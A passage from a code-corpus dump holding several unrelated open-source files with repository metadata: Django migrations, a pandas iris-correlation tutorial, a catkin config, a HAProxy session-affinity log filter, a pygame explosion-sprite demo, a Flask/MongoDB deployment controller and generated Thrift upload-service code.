('boardmeetingvideo_document_node', models.OneToOneField(db_column='boardmeetingvideo_document_node', editable=False, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='objects.Document')),
('related_node', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='documents_boardmeetingvideo_node', to='objects.Node')),
],
options={
'permissions': (('trash_boardmeetingvideo', 'Can soft delete board meeting video'), ('restore_boardmeetingvideo', 'Can restore board meeting video')),
'verbose_name_plural': 'Board Meeting Videos',
'default_manager_name': 'objects',
'db_table': 'documents_boardmeetingvideo',
'get_latest_by': 'update_date',
'verbose_name': 'Board Meeting Video',
},
bases=('objects.document',),
),
]
|
[
"jd@iamjdcollins.com"
] |
jd@iamjdcollins.com
|
71420c46e794fbf9129e80cd832982ba3453f560
|
c0836fbc0d26ec5b4fbef8b116536ee1573a63e3
|
/1_basic/2_pandas/pandas_15.py
|
c103bccdeca3d2290f5bb6aabbc243f1cc9500b8
|
[] |
no_license
|
SungmanHan/machineLearningStudy
|
5e4c2869351cceddb6cd212323c4a710a97984cc
|
36854f946252158b2cdb18b6842f0c905d0811b1
|
refs/heads/master
| 2020-07-12T21:21:18.126845
| 2019-09-25T13:23:50
| 2019-09-25T13:23:50
| 204,908,533
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,567
|
py
|
# -*- coding: utf-8 -*-
import pandas as pd
# Code that loads the bundled training datasets from
# scikit-learn's sklearn.datasets package
# (functions are defined under load_... names)
from sklearn.datasets import load_iris
# Load the iris dataset
iris_data = load_iris()
# A Bunch-typed value is returned:
# a dictionary-like type from which
# data can be extracted by key
print(type(iris_data))
# The Bunch class's keys method
# returns the list of available keys
print(iris_data.keys())
# The 'data' key returns the feature data
# (as a 2-D numpy array)
print(iris_data['data'])
print(iris_data.data)
print(type(iris_data.data))
# Store the feature data in a
# pandas DataFrame
X_df = pd.DataFrame(iris_data.data)
# Use the Bunch object's feature_names key
# to set the DataFrame header
X_df.columns = iris_data.feature_names
# Check the sample count and missing data in the iris set
print(X_df.info())
# Check summary statistics of the numeric iris data
print(X_df.describe())
# Create a Series for the label data:
# the 'target' key returns the labels
# (as a 1-D numpy array)
y_df = pd.Series(iris_data.target)
# Inspect the data:
# datasets shipped with scikit-learn
# come preprocessed, so numeric values
# are provided instead of strings
print(y_df)
# Check the label distribution
print(y_df.value_counts())
print(y_df.value_counts() / len(y_df))
# Join the feature data and the label data
all_df = pd.concat([X_df, y_df], axis=1)
# Use a pandas option to raise the maximum
# number of columns printed to the screen
pd.options.display.max_columns = 10
print(all_df)
# corr() analyzes and returns the pairwise
# correlations between the DataFrame's columns
corr_df = all_df.corr()
# Print the correlations between the label
# column and the feature columns:
# values near 1 indicate a strong positive correlation
# (the feature value grows as the label value grows),
# values near 0 indicate little correlation
# (the feature varies independently of the label),
# values near -1 indicate a strong negative correlation
# (the feature value shrinks as the label value grows)
print(corr_df)
print(iris_data.target_names)
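# For example, to rank features by the strength of their correlation with
# the label (after concat the unnamed label Series becomes column 0):
print(corr_df[0].drop(0).abs().sort_values(ascending=False))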
|
[
"hansung926@gmail.com"
] |
hansung926@gmail.com
|
8edae035598a6bff9f6a7325d526abfd07cb3fab
|
e5ba55ac56d2d07aeebd7253fbe5d186196c9a52
|
/catkin_ws/catkin_ws/build/iai_kinect2/kinect2_registration/catkin_generated/pkg.installspace.context.pc.py
|
85e878c71d08a7cf827ee4e610db3258f4e5642e
|
[] |
no_license
|
masiro97/darrsm
|
5305a3e7c1fba2635a4925b9e079f45b40162862
|
b881d00427d2af5d75ca509a191e57f2890e1ece
|
refs/heads/master
| 2021-05-10T21:57:17.760536
| 2018-01-20T15:13:56
| 2018-01-20T15:13:56
| 111,084,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 605
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/cun/catkin_ws/install/include;/usr/include".split(';') if "/home/cun/catkin_ws/install/include;/usr/include" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lkinect2_registration;-l:/usr/lib/x86_64-linux-gnu/libOpenCL.so".split(';') if "-lkinect2_registration;-l:/usr/lib/x86_64-linux-gnu/libOpenCL.so" != "" else []
PROJECT_NAME = "kinect2_registration"
PROJECT_SPACE_DIR = "/home/cun/catkin_ws/install"
PROJECT_VERSION = "0.0.1"
|
[
"estrk7120@gmail.com"
] |
estrk7120@gmail.com
|
542816beffb8b703f3ac06dfc3663090ffee2d00
|
b129c9b11e9d2c06114f45ce03a94f4f2a177119
|
/hugin/haproxy/filters/userstate.py
|
c25adced17d38446916ca97be7ca2a70eced1dc0
|
[] |
no_license
|
pyfidelity/hugin.haproxy
|
a9e48e345b03ed9d361c0d6c8617135378f5c311
|
444e30350936883e7749c2371f394fa82c1644fe
|
refs/heads/master
| 2016-09-01T17:29:48.210244
| 2014-11-24T12:34:51
| 2014-11-24T12:34:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,529
|
py
|
# Userstate detects when users switch backend nodes while session affinity is in use.
import re
from hugin.haproxy import registerFilter
from collections import deque
COOKIEMATCH = re.compile('.*="?(?P<cookie>\S+)')
class UserState(object):
def __init__(self):
self.duplicates = 0 # Redundant reloads where user press stop or reload
self.redispatch = 0 # Session affinity redispatch
self.affinity = 0 # Session affinity where previous 4 request were to the same instance
self.status = {} # Keep track of last 4 requests for each uid
def process(self, data):
#match = COOKIEMATCH.match(data['reqcookie'])
#if match:
# uid = match.group('cookie')
reqcookie = data.get('reqcookie', None)
if reqcookie is not None and len(reqcookie) > 1:
uid = reqcookie[6:] # __ac="cookieval...
hist = self.status.get(uid, deque(maxlen=4)) # We keep track of the 4 last requests
previous = hist and hist[0]
instance = data['instance']
if previous:
# Detect redundant reloads - C is client abort
if previous['terminationevent'] == 'C' and previous['url'] == data['url']:
self.duplicates += 1
            # Check for session affinity: count once when the current and
            # all tracked previous requests hit the same instance
            if previous['instance'] == instance:
                for item in hist:
                    if item['instance'] != instance:
                        break  # Different instance, no affinity
                else:
                    self.affinity += 1
# We only check for redispatch or affinity if we have a full history
elif len(hist) == 4:
# Check for redispatch
instances = set([h['instance'] for h in hist])
if len(instances) == 1:
self.redispatch += 1
hist.appendleft(dict(url=data['url'],
terminationevent=data['terminationevent'],
instance=instance,))
self.status[uid] = hist
return data
def stats(self, reset=True, count=20):
duplicates, redispatch, affinity = self.duplicates, self.redispatch, self.affinity
if reset:
self.duplicates = self.redispatch = self.affinity = 0
return dict(duplicates=duplicates,
redispatch=redispatch,
affinity=affinity)
registerFilter('userstate', UserState())
|
[
"florian.schulze@gmx.net"
] |
florian.schulze@gmx.net
|
0535d5b25645641c17f7429e27beadf5cbf303d1
|
1b6fd0e1da9aa6d28b19540887ffcb5233ac3692
|
/Resources/RP01/P01.3/sprites_001.py
|
8bd0fb678689dd03c92fa1ffe7d2cdabc160fd01
|
[] |
no_license
|
rugbyprof/4443-2D-PyGame
|
a637cd1237f90ca30a484d9fb2b6738571777d8c
|
bba26f794bd85599cf0598c1c64feec59fa31246
|
refs/heads/master
| 2022-11-27T14:14:54.982351
| 2020-08-05T19:32:45
| 2020-08-05T19:32:45
| 271,365,653
| 3
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,735
|
py
|
"""
Sprite Helper
Description:
Loading a sprite animation and displaying it.
Problems using a single instance of image.
"""
# Import and initialize the pygame library
import pygame
import random
import json
import pprint
import sys
import os
import math
import glob
from helper_module import rgb_colors
from helper_module import mykwargs
from helper_module import straightDistance
from helper_module import getCardinalDirection
# Import pygame.locals for easier access to key coordinates
# Updated to conform to flake8 and black standards
from pygame.locals import (
K_UP,
K_DOWN,
K_LEFT,
K_RIGHT,
K_ESCAPE,
KEYDOWN,
QUIT,
)
# Keep up with the config stuff. Adding sprite sheets for
# characters and other graphics now
config = {
'title' :'P01.3 Pygame Sprite Movement',
'window_size' : {
'width' : 640,
'height' : 480
},
'sprite_sheets':{
'explosion_01':{'path':'./media/fx/explosion_01'},
'green_monster':{'path':'./media/characters/green_monster'}
},
'background':'./media/backgrounds/tile_1000x1000_40_light.png',
'fps':60
}
colors = rgb_colors('colors.json')
def LoadSpriteImages(path):
""" Load sprite images into either a dictionary of moves or a list of images depending
on whether the "sprite" is a multi move character or a single effect with just frames
to play.
This method reads a json file looking for the following formats (right now):
"""
if not os.path.isdir(path):
print(f"Error: {path} not a valid sprite folder!")
sys.exit()
if not os.path.isfile(os.path.join(path,"moves.json")):
print(f"Error: 'moves.json' is required to be in folder!")
sys.exit()
# open the json file thats expected to be in the folder
# and read it in as a string
f = open(os.path.join(path,"moves.json"),"r")
# make raw string into a python dictionary
sprite_info = json.loads(f.read())
# base name is used to build filename
base_name = sprite_info['base_name']
# ext as well
ext = sprite_info['ext']
# If moves is a key in the dictionary then we create a dictionary of
# of moves where each move points to a list of images for that move
if 'moves' in sprite_info:
moves = {}
for move,nums in sprite_info['moves'].items():
images = []
for num in nums:
images.append(os.path.join(path,base_name+num+ext))
moves[move] = images
return moves
# If frames in the dictionary, then its an effect with a list of images
# for that effect. We need to order them before return since glob
# doesn't get directory items in order.
elif 'frames' in sprite_info:
images = sprite_info['frames']
if type(images) == list:
pass
elif type(images) == str and images == '*':
images = glob.glob(os.path.join(path,'*'+ext))
images.sort()
return images
else:
print(f"Error: 'moves' or 'frames' key not in json!!")
sys.exit()
class Explosion(pygame.sprite.Sprite):
def __init__(self, **kwargs):
# Initiate this sprite
pygame.sprite.Sprite.__init__(self)
# get location of sprites for this animation
fx_sprites = kwargs.get('fx_sprites',None)
# if not throw error
if not fx_sprites:
print("Error: Need location of fx_sprites!")
sys.exit(0)
self.center = kwargs.get('loc',(0,0))
# This function finds the json file and loads all the
# image names into a list
self.images = LoadSpriteImages(fx_sprites)
# container for all the pygame images
self.frames = []
# load images and "convert" them. (see link at top for explanation)
for image in self.images:
self.frames.append(pygame.image.load(image))
# animation variables
self.frame = 0
self.last_update = pygame.time.get_ticks()
self.frame_rate = 0 # smaller = faster
# prime the animation
self.image = self.frames[0]
self.rect = self.image.get_rect()
self.rect.center = self.center
def setLocation(self,loc):
""" Set the center of the explosion
"""
self.center = loc
self.rect.center = loc
def update(self):
""" Overloaded method from sprite which gets called by the game loop when
a sprite group gets updated
"""
now = pygame.time.get_ticks() # get current game clock
if now - self.last_update > self.frame_rate: #
self.last_update = now
self.frame += 1
if self.frame == len(self.frames):
self.kill()
self.frame = 0
else:
center = self.rect.center
self.image = self.frames[self.frame]
self.rect = self.image.get_rect()
self.rect.center = center
def main():
pygame.init()
# sets the window title
pygame.display.set_caption(config['title'])
# Game size of game window from config
width = config['window_size']['width']
height = config['window_size']['height']
# Set up the drawing window
screen = pygame.display.set_mode((width,height))
# load our background
background = pygame.image.load(config['background'])
# sprite group to handle all the visuals
all_sprites = pygame.sprite.Group()
# help control event timing
clock = pygame.time.Clock()
e = Explosion(fx_sprites=config['sprite_sheets']['explosion_01']['path'])
# Run until the user asks to quit
# game loop
running = True
while running:
clock.tick(config['fps'])
# fill screen with white
screen.fill(colors['white'])
# show background grid (no moving it)
screen.blit(background, (0,0))
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.KEYDOWN:
event.key
if event.type == pygame.KEYUP:
event.key
if event.type == pygame.MOUSEMOTION:
pass
if event.type == pygame.MOUSEBUTTONUP:
print(pygame.mouse.get_pos())
e.setLocation(pygame.mouse.get_pos())
all_sprites.add(e)
all_sprites.update()
all_sprites.draw(screen)
pygame.display.flip()
# Done! Time to quit.
pygame.quit()
if __name__=='__main__':
main()
|
[
"terry.griffin@msutexas.edu"
] |
terry.griffin@msutexas.edu
|
a90e6404551b5912048b4829a5294fbb441ab70e
|
93a95c5b9411960b394cfb63e400910d7d1abf50
|
/estoque/migrations/0002_auto_20210510_1515.py
|
ea13d302de4b62141beacc1712e501fe83515d36
|
[
"MIT"
] |
permissive
|
jonathan-mothe/estoque
|
9377e4ac826fabe9d1a4f66f817204334a59a311
|
de8d0ea87e67e93ad4922a2d81b1ba7d68a29845
|
refs/heads/master
| 2023-04-21T19:08:07.579886
| 2021-05-11T17:46:31
| 2021-05-11T17:46:31
| 364,916,799
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,283
|
py
|
# Generated by Django 3.2.2 on 2021-05-10 18:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('estoque', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='EstoqueEntrada',
fields=[
],
options={
'verbose_name': 'estoque estrada',
'verbose_name_plural': 'estoque entrada',
'proxy': True,
'indexes': [],
'constraints': [],
},
bases=('estoque.estoque',),
),
migrations.CreateModel(
name='EstoqueSaida',
fields=[
],
options={
'verbose_name': 'estoque saída',
'verbose_name_plural': 'estoque saída',
'proxy': True,
'indexes': [],
'constraints': [],
},
bases=('estoque.estoque',),
),
migrations.AlterField(
model_name='estoqueitens',
name='estoque',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='estoques', to='estoque.estoque'),
),
]
|
[
"jonathan.mothe@gmail.com"
] |
jonathan.mothe@gmail.com
|
1fd9d339fb8682ef8a6f21a25cc9fe2d23ae8ca3
|
09bcd2a342fc79a4a7c30e24a76788d90df2176d
|
/galleria/artists/migrations/0001_initial.py
|
f3a25b6873d47bb0d9d6a0437de97740b0176461
|
[
"Apache-2.0"
] |
permissive
|
kamalhg/galleria
|
48b2ed5ef1931ee12b7247caf7e50caa167c88ff
|
18ee38e99869812e61244d62652514d1c46bf3f3
|
refs/heads/master
| 2020-12-27T12:15:22.233386
| 2014-06-18T15:53:54
| 2014-06-18T15:53:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,628
|
py
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Artist'
db.create_table('artists_artist', (
('created', self.gf('model_utils.fields.AutoCreatedField')(default=datetime.datetime.now)),
('modified', self.gf('model_utils.fields.AutoLastModifiedField')(default=datetime.datetime.now)),
('contact', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['contacts.Contact'], primary_key=True, unique=True)),
('gallery_id', self.gf('django.db.models.fields.IntegerField')()),
('biography', self.gf('django.db.models.fields.TextField')()),
('price', self.gf('django.db.models.fields.TextField')()),
('info', self.gf('django.db.models.fields.TextField')()),
('commission', self.gf('django.db.models.fields.DecimalField')(decimal_places=3, max_digits=4)),
))
db.send_create_signal('artists', ['Artist'])
def backwards(self, orm):
# Deleting model 'Artist'
db.delete_table('artists_artist')
models = {
'artists.artist': {
'Meta': {'object_name': 'Artist'},
'biography': ('django.db.models.fields.TextField', [], {}),
'commission': ('django.db.models.fields.DecimalField', [], {'decimal_places': '3', 'max_digits': '4'}),
'contact': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['contacts.Contact']", 'primary_key': 'True', 'unique': 'True'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'gallery_id': ('django.db.models.fields.IntegerField', [], {}),
'info': ('django.db.models.fields.TextField', [], {}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'price': ('django.db.models.fields.TextField', [], {})
},
'categories.category': {
'Meta': {'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
'contacts.address': {
'Meta': {'object_name': 'Address'},
'city': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts.Contact']"}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'county': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'postcode': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'contacts.contact': {
'Meta': {'object_name': 'Contact'},
'addressed_as': ('django.db.models.fields.CharField', [], {'default': "'calculated'", 'max_length': '100'}),
'addressed_as_custom': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'null': 'True', 'blank': 'True', 'to': "orm['categories.Category']"}),
'company': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'company_or_individual': ('django.db.models.fields.CharField', [], {'default': "'individual'", 'max_length': '10'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'department': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'job_title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'main_address': ('django.db.models.fields.related.ForeignKey', [], {'null': 'True', 'to': "orm['contacts.Address']", 'blank': 'True', 'related_name': "'main_address'"}),
'main_phonenumber': ('django.db.models.fields.related.ForeignKey', [], {'null': 'True', 'to': "orm['contacts.PhoneNumber']", 'blank': 'True', 'related_name': "'main_phonenumber'"}),
'migration_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'name_first': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'name_last': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'name_middle': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'reference': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts.ContactType']"})
},
'contacts.contacttype': {
'Meta': {'object_name': 'ContactType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
'contacts.phonenumber': {
'Meta': {'object_name': 'PhoneNumber'},
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts.Contact']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['artists']
|
[
"hum3@drummond.info"
] |
hum3@drummond.info
|
a0d0b8457024d2982d5052c463bd38f342cf93d4
|
e18f0a32703fbe841d27c8a0e55eca9b9ab39cce
|
/run.py
|
c3e6569870cc01a9823fac62025ce182b58ea349
|
[
"Apache-2.0"
] |
permissive
|
qybing/tf-pose-estimation
|
302550e74d457edea178b8e36a9cd58c1cbe89e8
|
9adc3d4bf1c87fba4df977b83cee8e656882fe15
|
refs/heads/master
| 2023-04-10T08:59:08.778691
| 2019-06-19T06:11:49
| 2019-06-19T06:11:49
| 189,166,320
| 0
| 0
|
Apache-2.0
| 2023-03-25T00:06:18
| 2019-05-29T06:44:17
|
PureBasic
|
UTF-8
|
Python
| false
| false
| 3,518
|
py
|
import argparse
import logging
import sys
import time
from tf_pose import common
import cv2
import numpy as np
from tf_pose.estimator import TfPoseEstimator
from tf_pose.networks import get_graph_path, model_wh
logger = logging.getLogger('TfPoseEstimatorRun')
logger.handlers.clear()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='tf-pose-estimation run')
parser.add_argument('--image', type=str, default='./images/p1.jpg')
parser.add_argument('--model', type=str, default='mobilenet_thin',
help='cmu / mobilenet_thin / mobilenet_v2_large / mobilenet_v2_small')
parser.add_argument('--resize', type=str, default='0x0',
help='if provided, resize images before they are processed. '
'default=0x0, Recommends : 432x368 or 656x368 or 1312x736 ')
parser.add_argument('--resize-out-ratio', type=float, default=4.0,
help='if provided, resize heatmaps before they are post-processed. default=1.0')
args = parser.parse_args()
w, h = model_wh(args.resize)
if w == 0 or h == 0:
e = TfPoseEstimator(get_graph_path(args.model), target_size=(432, 368))
else:
e = TfPoseEstimator(get_graph_path(args.model), target_size=(w, h))
# estimate human poses from a single image !
image = common.read_imgfile(args.image, None, None)
if image is None:
logger.error('Image can not be read, path=%s' % args.image)
sys.exit(-1)
t = time.time()
humans = e.inference(image, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
elapsed = time.time() - t
logger.info('inference image: %s in %.4f seconds.' % (args.image, elapsed))
image = TfPoseEstimator.draw_humans(image, humans, imgcopy=False)
try:
import matplotlib.pyplot as plt
fig = plt.figure()
a = fig.add_subplot(2, 2, 1)
a.set_title('Result')
plt.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
bgimg = cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_BGR2RGB)
bgimg = cv2.resize(bgimg, (e.heatMat.shape[1], e.heatMat.shape[0]), interpolation=cv2.INTER_AREA)
# show network output
a = fig.add_subplot(2, 2, 2)
plt.imshow(bgimg, alpha=0.5)
tmp = np.amax(e.heatMat[:, :, :-1], axis=2)
plt.imshow(tmp, cmap=plt.cm.gray, alpha=0.5)
plt.colorbar()
tmp2 = e.pafMat.transpose((2, 0, 1))
tmp2_odd = np.amax(np.absolute(tmp2[::2, :, :]), axis=0)
tmp2_even = np.amax(np.absolute(tmp2[1::2, :, :]), axis=0)
a = fig.add_subplot(2, 2, 3)
a.set_title('Vectormap-x')
# plt.imshow(CocoPose.get_bgimg(inp, target_size=(vectmap.shape[1], vectmap.shape[0])), alpha=0.5)
plt.imshow(tmp2_odd, cmap=plt.cm.gray, alpha=0.5)
plt.colorbar()
a = fig.add_subplot(2, 2, 4)
a.set_title('Vectormap-y')
# plt.imshow(CocoPose.get_bgimg(inp, target_size=(vectmap.shape[1], vectmap.shape[0])), alpha=0.5)
plt.imshow(tmp2_even, cmap=plt.cm.gray, alpha=0.5)
plt.colorbar()
plt.show()
except Exception as e:
        logger.warning('matplotlib error, %s' % e)
cv2.imshow('result', image)
cv2.waitKey()
|
[
"qiaoyanbing1@163.com"
] |
qiaoyanbing1@163.com
|
bd94282c6683da22e869c64a0dd76f5ba27d7158
|
35c1dcb0c8a713725a8d9d3062df26b096a4c150
|
/setup.py
|
295d74e177fe1a2cc941145ea359d2970b74527a
|
[
"MIT"
] |
permissive
|
ijgarcesc/pybiblio
|
84fc78c09866a65bd13945ab36c8841587d74f09
|
02428eba8c4fcef3f9311ca9ba7be6bab661ca9e
|
refs/heads/master
| 2021-07-15T07:40:08.319875
| 2017-10-18T13:57:08
| 2017-10-18T13:57:08
| 105,827,028
| 0
| 0
| null | 2017-10-04T22:48:12
| 2017-10-04T22:48:12
| null |
UTF-8
|
Python
| false
| false
| 899
|
py
|
from setuptools import setup
def readme():
with open('README.md') as f:
return f.read()
setup(name='pybiblio',
version='0.0.0',
description='Analysis of bibliographic information using python',
      long_description='A tool for creating and grading assignments in the Jupyter Notebook using the Virtual Programming Lab plugin and Moodle',
classifiers=[
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.5',
'Intended Audience :: Education',
'License :: Free For Educational Use',
],
keywords='Scopus',
url='http://github.com/jdvelasq/pybiblio',
author='Juan D. Velasquez, Johana Garces',
author_email='jdvelasq@unal.edu.co',
license='MIT',
packages=['pybibio'],
include_package_data=True,
zip_safe=False)
|
[
"jdvelasq@unal.edu.co"
] |
jdvelasq@unal.edu.co
|
3245b49aa803d9fd7eaad75b78856c0dd540cbf0
|
1d4adeca605818749247235dba11a90fbc154748
|
/deprecated/services/deployment/deployment_controller.py
|
6ccff0b553fb38655e4e8f6737b142ce9a9a71f7
|
[
"Apache-2.0"
] |
permissive
|
joshish-iu/cloudmesh-nist
|
4598cd884fb9faaef5ea5cc5fa3e3920dbc6ebff
|
c26952859c2230231420058f6c488c9f6cc73218
|
refs/heads/master
| 2020-05-26T13:11:51.730994
| 2019-05-21T10:42:28
| 2019-05-21T10:42:28
| 188,243,290
| 0
| 0
|
NOASSERTION
| 2019-05-23T13:48:49
| 2019-05-23T13:48:48
| null |
UTF-8
|
Python
| false
| false
| 905
|
py
|
import connexion
import six
#from deployment_controller import *
from swagger_server.models.deployment import Deployment # noqa: E501
from swagger_server import util
from pymongo import MongoClient
client = MongoClient()
db = client['cm']
deployments = db['deployment']
def get_deployment():
"""
:return: list all the deployments as a list
"""
# ok
return list(deployments.find({}, {'_id': False}))
def add_deployment(deployment=None):
    # ok
    if connexion.request.is_json:
        deployment = Deployment.from_dict(deployment)
    deployments.insert_one(deployment.to_dict())
    return deployment
def get_deployment_by_name(name):
    # BUG: not yet guaranteed there is only one document per name
    for element in deployments.find({'name': name}):
        return (element['name'],
                element['description'],
                element['value'],
                element['kind'])
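# A sketch of a deterministic variant, as the BUG note suggests
# (assumes pymongo's find_one; uniqueness of name is still not enforced):
def get_deployment_by_name_unique(name):
    element = deployments.find_one({'name': name}, {'_id': False})
    if element is None:
        return None
    return (element['name'],
            element['description'],
            element['value'],
            element['kind'])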
|
[
"laszewski@gmail.com"
] |
laszewski@gmail.com
|
63049adb954204a6d260ac373203abbc430dd063
|
67568ac53039fd633f9017bd368a13258191e1b2
|
/thrift_example/file_transport/file/FileService.py
|
429826b7eddda8fd50d339c35c87f6a40c1cd0ea
|
[] |
no_license
|
starryrbs/rpc_shared
|
22012bbb5e0916a178e088f1be58acedd589c13d
|
6e4feb2929337ccb885ff629c13a0a6d3bc457d2
|
refs/heads/master
| 2022-12-11T04:27:24.176393
| 2020-09-02T16:01:37
| 2020-09-02T16:01:37
| 291,492,629
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| true
| 7,528
|
py
|
#
# Autogenerated by Thrift Compiler (0.12.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
all_structs = []
class Iface(object):
def uploadFile(self, filedata):
"""
Parameters:
- filedata
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def uploadFile(self, filedata):
"""
Parameters:
- filedata
"""
self.send_uploadFile(filedata)
return self.recv_uploadFile()
def send_uploadFile(self, filedata):
self._oprot.writeMessageBegin('uploadFile', TMessageType.CALL, self._seqid)
args = uploadFile_args()
args.filedata = filedata
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_uploadFile(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = uploadFile_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "uploadFile failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["uploadFile"] = Processor.process_uploadFile
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_uploadFile(self, seqid, iprot, oprot):
args = uploadFile_args()
args.read(iprot)
iprot.readMessageEnd()
result = uploadFile_result()
try:
result.success = self._handler.uploadFile(args.filedata)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("uploadFile", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class uploadFile_args(object):
"""
Attributes:
- filedata
"""
def __init__(self, filedata=None,):
self.filedata = filedata
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.filedata = File()
self.filedata.read(iprot)
else:
